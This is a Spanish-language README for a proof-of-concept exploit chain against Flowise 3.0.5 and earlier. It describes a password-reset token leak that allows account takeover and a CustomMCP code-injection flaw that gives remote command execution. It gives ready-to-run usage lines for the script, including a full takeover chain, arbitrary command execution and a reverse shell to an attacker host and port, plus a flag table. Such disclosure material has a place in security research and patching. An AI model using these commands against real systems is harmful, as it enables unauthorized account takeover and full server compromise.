
CVE-2025-58434 y CVE-2025-59528 POC en cadena
Cadena de explotación para dos vulnerabilidades que afectan Flowise <= 3.0.5.
El endpoint de olvido de contraseña devuelve un token de restablecimiento de contraseña válido en la respuesta de la API sin requerir autenticación. Un atacante con conocimiento de una dirección de correo electrónico válida puede restablecer la contraseña de cualquier cuenta sin interacción del usuario.
El nodo CustomMCP pasa la entrada controlada por el usuario directamente a un constructor Function() con privilegios completos de Node.js. Un usuario autenticado con una clave API válida puede ejecutar comandos arbitrarios del sistema operativo como el usuario del proceso de Flowise.
Corregido en: Flowise 3.0.6
pip install requestsCadena ATO completa (restablece la contraseña, solicita clave API, dispara shell inversa):
python3 flowise_chain.py -t http://target -e [email protected]
Solo RCE (si ya tienes una clave API):
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"
Shell inversa con clave existente:
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444
| Flag | Descripción |
|---|---|
-t, --target | URL del objetivo |
-e, --email | Correo electrónico de la cuenta objetivo (activa la cadena ATO) |
--api-key | Proporcionar clave API directamente (omite ATO) |
-c, --command | Comando a ejecutar |
--lhost | IP del atacante para shell inversa |
--lport | Puerto del atacante para shell inversa (por defecto: 4444) |
--new-password | Contraseña a establecer durante el restablecimiento (por defecto: Pwn3d!2026) |
-k, --insecure | Omitir verificación TLS |
Debido a una peculiaridad en Flowise 3.0.5, el endpoint de la API de restablecimiento de contraseña no actualiza inmediatamente la credencial aceptada por el endpoint de inicio de sesión. El script se pausa después del restablecimiento y te solicita que inicies sesión manualmente en la interfaz de usuario y copies la clave API de /apikey.